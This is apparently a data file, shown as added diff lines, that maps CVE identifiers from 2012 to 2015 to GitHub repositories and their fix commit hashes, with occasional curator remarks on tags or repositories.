+CVE-2012-6708;https://github.com/jquery/jquery;None:None;False;05531fc4080ae24070930d15ae0cea7ae056457d; +CVE-2013-0248;https://github.com/apache/commons-fileupload;None:None;False;f874563307c1159ac634df67509d9859bca6ddb9; +CVE-2013-0256;https://github.com/ruby/rdoc;None:None;False;ffa87887ee0517793df7541629a470e331f9fe60; +CVE-2013-0262;https://github.com/rack/rack;None:None;False;6f237e4c9fab649d3750482514f0fde76c56ab30,8de3c1d9902f8e64a385f38cf5711f26ffba19db,5c9b0de3d30971a36e953e6fed24e648daf3a68c; +CVE-2013-0263;https://github.com/rack/rack;None:None;False;9a81b961457805f6d1a5c275d053068440421e11,feea59c1abacd455c222bfee67541b1078378929,dcc7e6fa5106e1e8129f4bbe21f7e1607dbf5197,26c8500e9c49a0e625e1bd8d7158cabdfa2e17ae,aeb1c8d0fa1bfa21357cfe6d55898dedf3b337e1,0cd7e9aa397f8ebb3b8481d67dbac8b4863a7f07,a227999ab37cde072fa75495cd1d3bbcbcaf0474,6c39dfc8e8d8d631730449516cddb9b23a24337c,8748d492a4bc966de51f2ddf8edd498a3fa0e122,93abac98b13a0afa90293e4ec597cf505d46a343,471a37c15ad1b8b4a3bdfb190a5bf7aa770ec6d3; +CVE-2013-0285;https://github.com/savonrb/nori;None:None;False;818f5263b1d597b603d46cbe1702cd2717259e32,d9b68667249b98776fb23ba9e9c548dc4b524709,2ca6f8603e406f884a8fcea6bc26f8f6bf168f40; +CVE-2013-0294;https://github.com/pyradius/pyrad;None:None;False;38f74b36814ca5b1a27d9898141126af4953bee5; +CVE-2013-1607;https://github.com/pdfkit/pdfkit;None:None;False;ce37ffcdb223b34dd215971e2cd365e3a66cb5f1; +CVE-2013-1654;https://github.com/puppetlabs/puppet;None:None;False;be920acdb4762f6d813a29065ba210aef3ef612a,add9998c2f7c49c1eabf846566c0272a5f931f45,52be043933d40aab3449214f2aa602ceb214f91e; +CVE-2013-1800;https://github.com/jnunemaker/crack;None:None;False;e3da1212a1f84a898ee3601336d1dbbf118fb5f6; +CVE-2013-1801;https://github.com/jnunemaker/httparty;None:None;False;53a812426dd32108d6cba4272b493aa03bc8c031; +CVE-2013-1812;https://github.com/openid/ruby-openid;None:None;False;a3693cef06049563f5b4e4824f4d3211288508ed,be2bab5c21f04735045e071411b349afb790078f,3540a51e6f2f7fc7033f906fbd0a6c5153155e5a; +CVE-2013-1879;https://github.com/apache/activemq;None:None;False;148ca81dcd8f14cfe2ff37012fd1aa42518f02dc; +CVE-2013-1880;https://github.com/apache/activemq;None:None;False;fafd12dfd4f71336f8e32c090d40ed1445959b40; +CVE-2013-2013;https://github.com/openstack/python-keystoneclient;None:None;False;f2e0818bc97bfbeba83f6abbb07909a8debcad77; +CVE-2013-2035;https://github.com/fusesource/hawtjni;None:None;False;92c266170ce98edc200c656bd034a237098b8aa5; +CVE-2013-2115;https://github.com/apache/struts;None:None;False;fed4f8e8a4ec69b5e7612b92d8ce3e476680474b,d7804297e319c7a12245e1b536e565fcea6d6503; +CVE-2013-2132;https://github.com/mongodb/mongo-python-driver;None:None;False;a060c15ef87e0f0e72974c7c0e57fe811bbd06a2,842e675299318e02d8d223c458df87c029f66efc,7395ce72bf54ef64d723e1b4140556ebd12a2a07,d9b088e6d8a8b5f71acff10b6a13ba2b22fca718; +CVE-2013-2134;https://github.com/apache/struts;None:None;False;54e5c912ebd9a1599bfcf7a719da17c28127bbe3,01e6b251b4db78bfb7971033652e81d1af4cb3e0,cfb6e9afbae320a4dd5bdd655154ab9fe5a92c16,711cf0201cdd319a38cf29238913312355db29ba; +CVE-2013-2135;https://github.com/apache/struts;None:None;False;54e5c912ebd9a1599bfcf7a719da17c28127bbe3,01e6b251b4db78bfb7971033652e81d1af4cb3e0,cfb6e9afbae320a4dd5bdd655154ab9fe5a92c16,711cf0201cdd319a38cf29238913312355db29ba; +CVE-2013-2172;https://github.com/apache/santuario-java;None:None;False;a6795ec8148c1f91d8633694599ce34a5c06050d; +CVE-2013-2191;https://github.com/python-bugzilla/python-bugzilla;None:None;False;a782282ee479ba4cc1b8b1d89700ac630ba83eef; +CVE-2013-2254;https://github.com/apache/sling-org-apache-sling-servlets-post;None:None;False;57091b9bb7699fdc8dfb900b0e9b01bb0a848e4b,7ddd5df1282a47a99af1f7f4897fc7abe1ec056b; +CVE-2013-2275;https://github.com/puppetlabs/puppet;None:None;False;b9023b0c919312df648e424f392aa88c9b081599,a52013709b708ed346ea612f85e2b97d96fa66e2,e01e61e8909ec3ad4c873905a4dd9b952e3f4009,632e12d24d460b6dfd5cd3b65b2ad6397f2a2193; +CVE-2013-3300;https://github.com/lift/framework;None:None;False;099d9c86cf6d81f4953957add478ab699946e601; +CVE-2013-3567;https://github.com/puppetlabs/puppet;None:None;False;ce50d4ab992efdd1edd138d2a0eb6987213dcad1; +CVE-2013-4002;https://github.com/apache/xerces2-j;None:None;False;266e837852e0f0e3c8c1ad572b6fc4dbb4ded17b; +CVE-2013-4111;https://github.com/openstack/python-glanceclient;None:None;False;822cd64c0718b46a065abbb8709f6b466d12e708; +CVE-2013-4116;https://github.com/npm/npm;None:None;False;f4d31693e73a963574a88000580db1a716fe66f1; +CVE-2013-4152;https://github.com/spring-projects/spring-framework;None:None;False;7576274874deeccb6da6b09a8d5bd62e8b5538b7,434735fbf6e7f9051af2ef027657edb99120b173,2c030d4dcf4866bccc7a59d47398d6bc0de52ce2,3515acfa3db84bb62ef8ef8794a214c0d55fd47e; +CVE-2013-4204;https://github.com/gwtproject/gwt;None:None;False;4b1e5710d184205116e0e144b4501feb998e40b6; vulnerable tag is fixed +CVE-2013-4249;https://github.com/django/django;None:None;False;cbe6d5568f4f5053ed7228ca3c3d0cce77cf9560,90363e388c61874add3f3557ee654a996ec75d78,bfbae15c669beab335400ab51a060e3d7d8e4c7a; +CVE-2013-4251;https://github.com/scipy/scipy;None:None;False;bd296e0336420b840fcd2faabb97084fd252a973,27f8ed3839a74c2c9a92455ae5ab139d63201133,a05353d4511a1d86254d6b0a577d87c6715114e2; +CVE-2013-4286;https://github.com/apache/tomcat80;None:None;False;f0a7dc325201131ed31211c503c3a23714d8244f,bcce3e4997a4ed06fe03e2517443f3ad8ade2dfa,41b90b6ebc3e7f898a5a87d197ddf63790d33315; the two last commits were from tomcat standard repo, not tomcat80. Also not included in RC3 and RC2 is already fixed. +CVE-2013-4316;https://github.com/apache/struts;None:None;False;58947c3f85ae641c1a476316a2888e53605948d1; +CVE-2013-4322;https://github.com/apache/tomcat80;None:None;False;d85d0d1764259b62db0374f01df4bf6dddb12712,c806b2fc6b04ca4e928b3467d94f30f20c820d9d; vulnerable tag is fixed +CVE-2013-4353;https://github.com/openssl/openssl;None:None;False;197e0ea817ad64820789d86711d55ff50d71f631,8d65fdb62e517281350372775b5f93fcc8489681,2f972419a324761783e251dbdc735065bff88ac8; +CVE-2013-4413;https://github.com/zombocom/wicked;None:None;False;fe31bb2533fffc9d098c69ebeb7afc3b80509f53; +CVE-2013-4428;https://github.com/openstack/glance;None:None;False;a50bfbf490fd354d08abd25b67aaab83b2a17a85,feb735412021b771d4fe8b5706506abe6677899b,02e97689e60b643d446720659c9688702aea197b; if using 2013.2 shound find it. The 2013.1.4 tag is nowhere in the commits +CVE-2013-4477;https://github.com/openstack/keystone;None:None;False;c6800ca1ac984c879e75826df6694d6199444ea0,4221b6020e6b0b42325d8904d7b8a22577a6acc0,82dcde08f60c45002955875664a3cf82d1d211bc; +CVE-2013-4562;https://github.com/simi/omniauth-facebook;None:None;False;ccfcc26fe7e34acbd75ad4a095fd01ce5ff48ee7; +CVE-2013-4701;https://github.com/openid/php-openid;None:None;False;625c16bb28bb120d262b3f19f89c2c06cb9b0da9; +CVE-2013-4761;https://github.com/puppetlabs/puppet;None:None;False;a177c9d333b052c4d81d09ae2538bd5393612c69,13a3048994b19e22c13ac32da8eb15af5cfea954; commits have no tags +CVE-2013-5093;https://github.com/graphite-project/graphite-web;None:None;False;c198e5836970f0970b96498fcbe6fa83d90110cf,4a9f98647be279a39a982bd94922fdec710b0b3f; +CVE-2013-5123;https://github.com/pypa/pip;None:None;False;c2b799df9cd9bd9fcc124f6729d56b3180c813e8,3ef4ee4693db5e255dcfef1acf73427f6c97646b,dc559473e2667de130cd3ed4d57c4e125ee10d93; +CVE-2013-6044;https://github.com/django/django;None:None;False;1a274ccd6bc1afbdac80344c9b6e5810c1162b5f,ec67af0bd609c412b76eaa4cc89968a2a8e5ad6a,ae3535169af804352517b7fea94a42a1c9c4b762,79594b40c087c19fecc72af042c835b11a519b78; +CVE-2013-6235;https://github.com/stevensouza/jamonapi;None:None;False;05e6be6849abade047056c25ece23d9553deb3f3; +CVE-2013-6348;https://github.com/apache/struts;None:None;False;fd27e5cc748420a53d51e0e19a10efe8c582c2c0,01584fabc74635d63a1b2670f18d8fcd1ee046cc; +CVE-2013-6429;https://github.com/spring-projects/spring-framework;None:None;False;2ae6a6a3415eebc57babcb9d3e5505887eda6d8a,7387cb990e35b0f1b573faf29d4f9ae183d7a5ef; +CVE-2013-6430;https://github.com/spring-projects/spring-framework;None:None;False;f5c9fe69a444607af667911bd4c5074b5b073e7b,7a7df6637478607bef0277bf52a4e0a03e20a248; +CVE-2013-6465;https://github.com/kiegroup/jbpm-wb;None:None;False;4818204506e8e94645b52adb9426bedfa9ffdd04; +CVE-2013-7315;https://github.com/frankneusource/spring-framework;None:None;False;7576274874deeccb6da6b09a8d5bd62e8b5538b7,434735fbf6e7f9051af2ef027657edb99120b173; +CVE-2013-7370;https://github.com/senchalabs/connect;None:None;False;277e5aad6a95d00f55571a9a0e11f2fa190d8135,126187c4e12162e231b87350740045e5bb06e93a; +CVE-2013-7378;https://github.com/github/hubot-scripts;None:None;False;feee5abdb038a229a98969ae443cdb8a61747782; +CVE-2013-7397;https://github.com/AsyncHttpClient/async-http-client;None:None;False;df6ed70e86c8fc340ed75563e016c8baa94d7e72,dfacb8e05d0822c7b2024c452554bd8e1d6221d8; +CVE-2013-7398;https://github.com/AsyncHttpClient/async-http-client;None:None;False;a894583921c11c3b01f160ada36a8bb9d5158e96,bbdc1b3cc6ffc0eda0dd0ad54557db557ae937f7,fa056c572ab0c9b6edd05a7cc508898f35cc90d5,db6716ad2f10f5c2d5124904725017b2ba8c3434,3c9152e2c75f7e8b654beec40383748a14c6b51b; +CVE-2013-7459;https://github.com/pycrypto/pycrypto;None:None;False;8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4; +CVE-2014-0012;https://github.com/pallets/jinja;None:None;False;acb672b6a179567632e032f547582f30fa2f4aa7,964c61ce79f6748ff8c583e2eb12ec54082bf188; +CVE-2014-0014;https://github.com/emberjs/ember.js;None:None;False;d9977d62b26534555c0708acde0e7ae029e6d8ea,e52e047305849756c78abc1e760d621531c2c0a7,12fa46ba1c6efb9ddac7bfdef7f4f6909781c801,c80748313f93757b28f2bd3bd3d594e1e8e03d80,cc6cd6c1115e9f3f3ff2efa22dcb84080f7d4856,18f7d8a4159a707290ec9d09722aa4c39dfeb10a; +CVE-2014-0035;https://github.com/apache/cxf;None:None;False;5df3f72f1a26b7c9ac2888ab65e41f4105706580,2d2fd1bf67dc2247b6aca31b83a571d865fad1c9,d249721708694cbb0f431c0658166ebdcb02ec15; +CVE-2014-0050;https://github.com/apache/commons-fileupload;None:None;False;c61ff05b3241cb14d989b67209e57aa71540417a; +CVE-2014-0072;https://github.com/apache/cordova-plugin-file-transfer;None:None;False;a1d6fc07e8a40c1b2b16f4103c403b30e1089668; +CVE-2014-0073;https://github.com/apache/cordova-plugin-inappbrowser;None:None;False;26702cb0720c5c394b407c23570136c53171fa55; +CVE-2014-0075;https://github.com/apache/tomcat80;None:None;False;d49a03728ac7e3c800b1b0ce0eeccd8a5a21bb91,f646a5acd5e32d6f5a2d9bf1d94ca66b65477675,b6974571c122f6a1e7ec74a90fa212976fa7b0ed; +CVE-2014-0086;https://github.com/richfaces4/core;None:None;False;71687cef6a83f4f9b4430648e4bf06bb7653434b; +CVE-2014-0097;https://github.com/spring-projects/spring-security;None:None;False;88559882e967085c47a7e1dcbc4dc32c2c796868,a7005bd74241ac8e2e7b38ae31bc4b0f641ef973,7dbb8e777ece8675f3333a1ef1cb4d6b9be80395; +CVE-2014-0107;https://github.com/apache/xalan-j;None:None;False;52c27d504ced40719d243a8715d7f67d531723da,cbfd906cc5a1f1566fa1a98400c82e56077fae0c; +CVE-2014-0109;https://github.com/apache/cxf;None:None;False;f8ed98e684c1a67a77ae8726db05a04a4978a445,6dd839afbb4d834ed668738bd89e7775c1cf2f9d; +CVE-2014-0110;https://github.com/apache/cxf;None:None;False;8f4799b5bc5ed0fe62d6e018c45d960e3652373e,643b1bc7320ca90c3e078e50509f9a30a0ab45be,35cd29270b77b489cb23552637d66d47ce480f4c; +CVE-2014-0116;https://github.com/apache/struts;None:None;False;1a668af7f1ffccea4a3b46d8d8c1fe1c7331ff02; vulnerable tag is fixed +CVE-2014-0120;https://github.com/hawtio/hawtio;None:None;False;b4e23e002639c274a2f687ada980118512f06113; +CVE-2014-0121;https://github.com/hawtio/hawtio;None:None;False;5289715e4f2657562fdddcbad830a30969b96e1e; +CVE-2014-0160;https://github.com/openssl/openssl;None:None;False;96db9023b881d7cd9f379b0c154650d6c108e9a3; +CVE-2014-0177;https://github.com/github/hub;None:None;False;016ec99d25b1cb83cb4367e541177aa431beb600; +CVE-2014-0193;https://github.com/netty/netty;None:None;False;48edb7802b42b0e2eb5a55d8eca390e0c9066783,787a85f9f1b816ee901c1ec00348ae2007bb9d3b,8599ab5bdb761bb99d41a975d689f74c12e4892b,73b26b7c2598f36196b760ec590eefd37c8db62a,dfbd8e881980677bc21b5a53b80c8555061ffa84,cab1fa22ff43f604cc11631d5fccfa3e9231399a,93fab1d5a3a45a8104e560118930c1d652dce8cb; +CVE-2014-0224;https://github.com/openssl/openssl;None:None;False;bc8923b1ec9c467755cd86f7848c50ee8812e441,410a49a4fa1d2a1a9775ee29f9e40cbbda79c149,006cd7083f76ed5cb0d9a914857e9231ef1bc317; +CVE-2014-0225;https://github.com/spring-projects/spring-framework;None:None;False;44ee51a6c9c3734b3fcf9a20817117e86047d753,c6503ebbf7c9e21ff022c58706dbac5417b2b5eb,8e096aeef55287dc829484996c9330cf755891a1; +CVE-2014-0228;https://github.com/apache/hive;None:None;False;c3d7083b7605d1753946c4c4411e3a3241ea7ffe; 0.13.1 did not include the commit +CVE-2014-1202;https://github.com/SmartBear/soapui;None:None;False;6373165649ad74257493c69dbc0569caa7e6b4a6; +CVE-2014-1402;https://github.com/pallets/jinja;None:None;False;964c61ce79f6748ff8c583e2eb12ec54082bf188,acb672b6a179567632e032f547582f30fa2f4aa7; +CVE-2014-1403;https://github.com/oyvindkinsey/easyXDM;None:None;False;a3194d32c25a0d27a10a47304eb9c9be93ffbf13; +CVE-2014-1604;https://github.com/alex/rply;None:None;False;fc9bbcd25b0b4f09bbd6339f710ad24c129d5d7c; +CVE-2014-1829;https://github.com/psf/requests;None:None;False;f1893c835570d72823c970fbd6e0e42c13b1f0f2,7ba5a534ae9fc24e40b3ae6c480c9075d684727e,d9f34c6848b9b313beefa7d3ce05f52fdea28c27,326a22e8880c1dba52698a479eb7b6038d5b2e87; +CVE-2014-1830;https://github.com/psf/requests;None:None;False;f1893c835570d72823c970fbd6e0e42c13b1f0f2,7ba5a534ae9fc24e40b3ae6c480c9075d684727e,d9f34c6848b9b313beefa7d3ce05f52fdea28c27,326a22e8880c1dba52698a479eb7b6038d5b2e87,4d8cb3244e8e4f84b250c10a48e025f9a8bf6137; +CVE-2014-1832;https://github.com/phusion/passenger;None:None;False;94428057c602da3d6d34ef75c78091066ecac5c0,34b1087870c2bf85ebfd72c30b78577e10ab9744; +CVE-2014-1858;https://github.com/numpy/numpy;None:None;False;c7a30d538ba4c984d6f97b613486a3738b2c7922,961c43da78bf97ce63183b27c338db7ea77bed85,0bb46c1448b0d3f5453d5182a17ea7ac5854ee15; +CVE-2014-1859;https://github.com/numpy/numpy;None:None;False;961c43da78bf97ce63183b27c338db7ea77bed85,c7a30d538ba4c984d6f97b613486a3738b2c7922,0bb46c1448b0d3f5453d5182a17ea7ac5854ee15; +CVE-2014-1869;https://github.com/zeroclipboard/zeroclipboard;None:None;False;2f9eb9750a433965572d047e24b0fc78fd1415ca,eebdfa425ca2525f3b363cdc9e50bcfbcc35a2e6; +CVE-2014-1904;https://github.com/spring-projects/spring-framework;None:None;False;741b4b229ae032bd17175b46f98673ce0bd2d485; +CVE-2014-1932;https://github.com/python-pillow/Pillow;None:None;False;4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7,e9fe13da153be962e283937547a78c78f6ca81ff,1e331e3e6a40141ca8eee4f5da9f74e895423b66,844ed441deb6b75d3048fa111977188ed47f0b76,86d5c5c3894f58895f31287081cdd146f5fe00f7; +CVE-2014-1933;https://github.com/python-pillow/Pillow;None:None;False;1e331e3e6a40141ca8eee4f5da9f74e895423b66,4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7,e9fe13da153be962e283937547a78c78f6ca81ff,844ed441deb6b75d3048fa111977188ed47f0b76,86d5c5c3894f58895f31287081cdd146f5fe00f7; +CVE-2014-2053;https://github.com/JamesHeinrich/getID3;None:None;False;afbdaa044a9a0a9dff2f800bd670e231b3ec99b2,dc8549079a24bb0619b6124ef2df767704f8d0bc; +CVE-2014-2235;https://github.com/ASKBOT/askbot-devel;None:None;False;a676a86b6b7a5737d4da4f59f71e037406f88d29,876e3662ff6b78cc6241338c15e3a0cb49edf4e2; +CVE-2014-2525;https://github.com/yaml/libyaml;None:None;False;d1003a9d40b674520934f4f38ffc4ff2a809bc2d; +CVE-2014-2538;https://github.com/chopmo/rack-ssl;None:None;False;d99a9b403eb0cc7acbfa380daa501186e370583f,9d7d7300b907e496db68d89d07fbc2e0df0b487b,94041c3e68bdca772715a353295dd53e42cf5ed0,7445c16f989d2e434235c2df4f6d99ebff10897d; wrong repo old (changed probably) +CVE-2014-3007;https://github.com/python-pillow/Pillow;None:None;False;1e331e3e6a40141ca8eee4f5da9f74e895423b66,4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7; is pillow 2.3:2.4 +CVE-2014-3120;https://github.com/elastic/elasticsearch;None:None;False;95bd04b2c7fd7387c7e3b3367361dcf9fe9f9d06; +CVE-2014-3250;https://github.com/puppetlabs/puppet;None:None;False;b02af7e05d9b9a3bc23474933d8d7f6cd6191158; +CVE-2014-3488;https://github.com/netty/netty;None:None;False;2fa9400a59d0563a66908aba55c41e7285a04994; +CVE-2014-3505;https://github.com/openssl/openssl;None:None;False;bff1ce4e6a1c57c3d0a5f9e4f85ba6385fccfe8b,1b7024fb69161619855d86b80ae0681ea802e245,84361b898d456220039bc8b292f7b0ba70224a26,2172d4f63c61922487008f42511cc6bdae9b47a0,49850075555893c9c60d5b981deb697f3b9515ea; +CVE-2014-3506;https://github.com/openssl/openssl;None:None;False;1250f12613b61758675848f6600ebd914ccd7636,338a5e7e5458edf4cf754fd831a451fb4b57d180,934ca0714a686673695c055de86064f423984477,fc7804ec392fcf8051abe6bc9da9108744d2ae35,0598468fc04fb0cf2438c4ee635b587aac1bcce6; +CVE-2014-3509;https://github.com/openssl/openssl;None:None;False;fb0bc2b273bcc2d5401dd883fe869af4fc74bb21,03a12c1330575398cbdbd301b923af65bb7f4466,86788e1ee6908a5b3a4c95fa80caa4b724a8a434,92aa73bcbfad44f9dd7997ae51537ac5d7dc201e; +CVE-2014-3511;https://github.com/openssl/openssl;None:None;False;280b1f1ad12131defcd986676a8fc9717aaa601b,fc4bd2f287582c5f51f9549727fd5a49e9fc3012,67e53f73bf44ba354bac0fab1b38c6c596b49fc6,fc4f4cdb8bf9981904e652abf69b892a45bddacf,40a2200d89b2a559700cee95f1898312f993792a; +CVE-2014-3572;https://github.com/openssl/openssl;None:None;False;b15f8769644b00ef7283521593360b7b2135cb63,e42a2abadc90664e2615dc63ba7f79cf163f780a,ef28c6d6767a6a30df5add36171894c96628fe98,802a070bb6452dd9df49e550e0f3b16777e5232b,4aaf1e493cb86efa64f6a486a27d38da6bce23af; +CVE-2014-3576;https://github.com/apache/activemq;None:None;False;00921f22ff9a8792d7663ef8fadd4823402a6324; +CVE-2014-3577;https://github.com/apache/httpcomponents-client;None:None;False;51cc67567765d67f878f0dcef61b5ded454d3122; +CVE-2014-3578;https://github.com/spring-projects/spring-framework;None:None;False;8ee465103850a3dca018273fe5952e40d5c45a66,748167bfa33c3c69db2d8dbdc3a0e9da692da3a0,f6fddeb6eb7da625fd711ab371ff16512f431e8d; +CVE-2014-3579;https://github.com/apache/activemq-apollo;None:None;False;e5647554e6801a522c508a8eb457979a9af8c398; +CVE-2014-3599;https://github.com/hornetq/hornetq;None:None;False;b3a63576371828d5f8e64ba7ccbcecb1da8111d2; +CVE-2014-3600;https://github.com/apache/activemq;None:None;False;b9696ac80bb496b52d05c3884f81b0746d9af9e2,3e5ac6326db59f524a0e71f6b717428607d7b67d; +CVE-2014-3612;https://github.com/apache/activemq;None:None;False;22f2f3dde757d31307da772d579815c1d169bc39; +CVE-2014-3625;https://github.com/spring-projects/spring-framework;None:None;False;3f68cd633f03370d33c2603a6496e81273782601,9cef8e3001ddd61c734281a7556efd84b6cc2755,9beae9ae4226c45cd428035dae81214439324676; +CVE-2014-3630;https://github.com/playframework/playframework;None:None;False;656ee5a56bd7b2c7821d8dcb437688ae1deab1b7,97f9ddbb13d8f373e8088f4bb41cb2ccd6df9de7,b226583403179d815e8ae7e76c381b22a9a7c2e0; +CVE-2014-3709;https://github.com/keycloak/keycloak;None:None;False;bb132e1aa0b3b3a123883d0b8d0b788337df956d; +CVE-2014-3741;https://github.com/tojocky/node-printer;None:None;False;e001e38738c17219a1d9dd8c31f7d82b9c0013c7; +CVE-2014-3994;https://github.com/djblets/djblets;None:None;False;77a68c03cd619a0996f3f37337b8c39ca6643d6e,d3e428a6f7bc4c04d100b06e663c071fdc1717d9; +CVE-2014-3995;https://github.com/djblets/djblets;None:None;False;77ac64642ad530bf69e390c51fc6fdcb8914c8e7; +CVE-2014-4172;https://github.com/apereo/java-cas-client;None:None;False;ab6cbdc3daa451b4fef89c0bd0f4e6568f3aa9ef,9de2be91a2ed4f013900cb1facd4036c2f34d051,ae37092100c8eaec610dab6d83e5e05a8ee58814; +CVE-2014-4657;https://github.com/ansible/ansible;None:None;False;998793fd0ab55705d57527a38cee5e83f535974c; +CVE-2014-4658;https://github.com/ansible/ansible;None:None;False;a0e027fe362fbc209dbeff2f72d6e95f39885c69,75e0b7a5cf805217a9365b995c5b99ed12aea5af; +CVE-2014-4678;https://github.com/ansible/ansible;None:None;False;5429b85b9f6c2e640074176f36ff05fd5e4d1916,b8b96b210915789745ece8ad04f1c1bfc1c72030; +CVE-2014-5277;https://github.com/docker/docker-py;None:None;False;537b4681403cd9dd29b753584e6c8317edf7ae3f; +CVE-2014-6394;https://github.com/pillarjs/send;None:None;False;9c6ca9b2c0b880afd3ff91ce0d211213c5fa5f9a; +CVE-2014-7143;https://github.com/twisted/twisted;None:None;False;3b5942252f5f3e45862a0e12b266ab29e243cc33; 15.0.0 did not include the commit +CVE-2014-7189;https://github.com/golang/go;None:None;False;247820ff6bfba6e1b7891f4bfc25511d68761d5d; +CVE-2014-7192;https://github.com/browserify/syntax-error;None:None;False;9aa4e66eb90ec595d2dba55e6f9c2dd9a668b309; +CVE-2014-7193;https://github.com/hapijs/crumb;None:None;False;5e6d4f5c81677fe9e362837ffd4a02394303db3c; +CVE-2014-7202;https://github.com/zeromq/libzmq;None:None;False;fe4396c597929382214c7966e60f025114d4f32d,77f14aad95cdf0d2a244ae9b4a025e5ba0adf01a; +CVE-2014-7203;https://github.com/zeromq/libzmq;None:None;False;e40d4b23762502c2de9bc2bc4817dfe2f33b8ed9,0900a489213d74feb86fc0b343308fe7884a2a3c; +CVE-2014-7205;https://github.com/outmoded/bassmaster;None:None;False;bece966a3106ee6a5506efc2f9bc32c379f54aa1,b751602d8cb7194ee62a61e085069679525138c4; +CVE-2014-7809;https://github.com/apache/struts;None:None;False;1f301038a751bf16e525607c3db513db835b2999; +CVE-2014-8115;https://github.com/kiegroup/kie-wb-distributions;None:None;False;90eed433d36b21265fdf978252b8619766b8e74b; +CVE-2014-8152;https://github.com/apache/santuario-xml-security-java;None:None;False;3d7086c603a4538933dfa98d697d0df4539a984f; +CVE-2014-8176;https://github.com/openssl/openssl;None:None;False;d52eb82781eff1f8245ae9c16c84db765f037cbe,470990fee0182566d439ef7e82d1abf18b7085d7,bcc311668ede6ffdcd6dc5a65454a548b5404fcc,b79e6e3a276634582012d531f4150a5fcf84fab3,4b258e73ae0da0f1a7ff3eb9840b6978711c2400; +CVE-2014-8547;https://github.com/FFmpeg/FFmpeg;None:None;False;8f1457864be8fb9653643519dea1c6492f1dde57,9ae3cd6e7271a3d6b8cd92a4d35ebb16d2e03f1a,02de44073a8e116ea177b53081219d32ef135ad8,0b39ac6f54505a538c21fe49a626de94c518c903,7f90eef87ac84c617b102b689eb68e7cb140167b; +CVE-2014-8548;https://github.com/FFmpeg/FFmpeg;None:None;False;c727401aa9d62335e89d118a5b4e202edf39d905,a331e11906b196c9a00f5ffbc45d80fcd7fe8423,306ee95088243fefa2dfcb5c355d439db75e2d2a,f249e9889155599ee3ad0172832d38f68b0c625d,d423dd72be451462c6fb1cbbe313bed0194001ab,c0c24bc9b32419c7883a344c74a6779374a3c16a; +CVE-2014-8549;https://github.com/FFmpeg/FFmpeg;None:None;False;550f3e9df3410b3dd975e590042c0d83e20a8da3,cee4490b521fd0d02476d46aa2598af24fb8d686,84d26ab6eb07e22ad6ffcd8109ca1d1a0cd57bce; +CVE-2014-8650;https://github.com/requests/requests-kerberos;None:None;False;208bebb7008796a07be0204d9b5beaa55d2373ae,9c1e08cc17bb6950455a85d33d391ecd2bce6eb6; +CVE-2014-8681;https://github.com/gogs/gogs;None:None;False;83283bca4cb4e0f4ec48a28af680f0d88db3d2c8; +CVE-2014-8682;https://github.com/gogs/gogs;None:None;False;0c5ba4573aecc9eaed669e9431a70a5d9f184b8d; +CVE-2014-8991;https://github.com/pypa/pip;None:None;False;043fe9f5700315d97f83609c1f59deece8f1b901,01610be0d58bc428646126090cb2905cf219b2f4; +CVE-2014-9130;https://github.com/yaml/libyaml;None:None;False;e6aa721cc0e5a48f408c52355559fd36780ba32a; +CVE-2014-9489;https://github.com/gollum/grit_adapter;None:None;False;4520d973c81fecfebbeacd2ef2f1849d763951c7; +CVE-2014-9682;https://github.com/skoranga/node-dns-sync;None:None;False;d9abaae384b198db1095735ad9c1c73d7b890a0d; +CVE-2014-9720;https://github.com/tornadoweb/tornado;None:None;False;c2a8c322b3f3f54f6525d7469ecab1af46862bc2,1c36307463b1e8affae100bf9386948e6c1b2308,7279a303d1c366aabd4facfc6b29ed46c3422350; +CVE-2014-9721;https://github.com/zeromq/zeromq4-x;None:None;False;b6e3e0f601e2c1ec1f3aac880ed6a3fe63043e51; +CVE-2014-9970;https://github.com/jboss-fuse/jasypt;None:None;False;8e62852a8018978ee19d39056c650fb66ffa0ff6; +CVE-2014-10068;https://github.com/hapijs/inert;None:None;False;48a7fab2f36016893a05bf29b8ac70d21feb495e,f1c70be886c968e9786ab7feae721132fabed448,e8f99f94da4cb08e8032eda984761c3f111e3e82,08931fcef7e67b3f6aac7b207eafa31d3754f1ef; +CVE-2014-10077;https://github.com/ruby-i18n/i18n;None:None;False;9c8b24031abe12d9024e69eccda76ea8061976ba,24e71a9a4901ed18c9cab5c53109fd9bf2416bcb; +CVE-2015-0204;https://github.com/openssl/openssl;None:None;False;ce325c60c74b0fa784f5872404b722e120e5cab0,37580f43b5a39f5f4e920d17273fab9713d3a744,08a88774bd8463bedf7fe440a165d3d98b702361,72f181539118828ca966a0f8d03f6428e2bcf0d6,4b4c1fcc88aec8c9e001b0a0077d3cd4de1ed0e6; +CVE-2015-0205;https://github.com/openssl/openssl;None:None;False;1421e0c584ae9120ca1b88098f13d6d2e90b83a3,a4aa18879917d9bd45f52ac110c69303a852b7db,f7fe3d235abf201343c20a59f9d9c8957acc62ff,be3fb8d15dd5a233eab0c454677d538e64d17f82,98a0f9660d374f58f79ee0efcc8c1672a805e8e8; +CVE-2015-0206;https://github.com/openssl/openssl;None:None;False;b095884a58876ccd3e65f620b7f80d61b4bce687,7c6a3cf2375f5881ef3f3a58ac0fbd0b4663abd1,103b171d8fc282ef435f8de9afbf7782e312961f,04685bc949e90a877656cf5020b6d4f90a9636a6; +CVE-2015-0208;https://github.com/openssl/openssl;None:None;False;4b22cce3812052fe64fc3f6d58d8cc884e3cb834,09f06923e636019c39c807cb59c481375e720556; +CVE-2015-0209;https://github.com/openssl/openssl;None:None;False;5e5d53d341fd9a9b9cc0a58eb3690832ca7a511f,9e442d485008046933cdc7da65080f436a4af089,c380bff888bfd5e48c4b24250ba1996b0fd1a5e3,dfc3e9698b755e179e8ae8e3cef7ff4e07cfd500,dac693c957dc40dbf839f0add91b824deba26dc3,a4517be9e348634ac64f9cf093131e13e8c03e38,89117535f1bb3ea72a17933b703271587d7aaf0b,ba5d0113e8bcb26857ae58a11b219aeb7bc2408a,1b4a8df38fc9ab3c089ca5765075ee53ec5bd66a,18029a3d0739284cadb309ea0fd498379b0bcfdb; +CVE-2015-0250;https://github.com/apache/xmlgraphics-batik;None:None;False;efebce3f0ad33ede916a148b84d75749aea38349; +CVE-2015-0276;https://github.com/zhumengyuan/kallithea;None:None;False;68183cc8e48e4e4fee8510ee819f903b3af3a01b; 